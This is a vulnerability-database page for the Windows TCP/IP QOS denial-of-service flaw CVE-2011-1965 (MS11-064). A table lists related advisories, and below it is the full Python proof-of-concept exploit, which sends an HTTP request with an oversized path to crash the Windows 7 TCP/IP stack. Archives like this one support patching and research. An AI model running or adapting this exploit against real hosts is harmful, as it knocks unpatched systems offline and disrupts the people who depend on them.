| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Preemptive Protection against Microsoft Windows TCP/IP QOS Denial of Service (MS11-064; CVE-2011-1965) | 9 Aug 201100:00 | – | checkpoint_advisories | |
| Microsoft Windows TCP/IP QOS Denial of Service (MS11-064; CVE-2011-1965) | 28 May 201200:00 | – | checkpoint_advisories | |
| CVE-2011-1965 | 10 Aug 201121:16 | – | cve | |
| CVE-2011-1965 | 10 Aug 201121:16 | – | cvelist | |
| Microsoft Windows - TCPIP Stack Denial of Service (MS11-064) | 15 Oct 201100:00 | – | exploitpack | |
| CVE-2011-1965 | 10 Aug 201121:55 | – | nvd | |
| Microsoft Windows TCP/IP Stack Denial of Service Vulnerability (2563894) | 11 Aug 201100:00 | – | openvas | |
| Microsoft Windows TCP/IP Stack Denial of Service Vulnerability (2563894) | 11 Aug 201100:00 | – | openvas | |
| MS11-064 TCP/IP Stack Denial Of Service | 16 Oct 201100:00 | – | packetstorm | |
| Denial of service | 10 Aug 201121:55 | – | prion |
# Exploit Title: MS11-064 : Vulnerabilities in TCP/IP Stack Could
Allow Denial of Service
# Date: 10/12/2011
# Author: Byoungyoung Lee, http://www.cc.gatech.edu/~blee303/
# Version: Windows 7 32bit, fully patched until Aug 2011
# Tested on: Windows 7 32bit
# CVE : CVE-2011-1965
# analysis is available -
http://exploitshop.wordpress.com/2011/09/07/ms11-064-vulnerabilities-in-tcpip-stack-could-allow-denial-of-service-2563894/
------------------------------------------------------------------------------------------------------
# Byoungyoung Lee, http://twitter.com/mylifeasageek
import struct
import socket
HOST = "localhost" # yeah, we've tried this as a local kernel exploit -:)
PORT= 80
def tryOnce(i,j):
print hex(i), hex(j)
filename = ["a"*0x100 for x in range(i)]
filename = "/".join(filename)
filename += "/" + "b" * j
print "filename len : ", hex(len(filename))
hostname = "www.darungrim.org"
header = "GET /%s\n" % filename
header += "HOST: %s\n\n\n" % hostname
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST,PORT))
s.send(header)
response = s.recv(1024)
s.close()
print response
return
if __name__ == '__main__':
tryOnce(0x3c,0x7)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation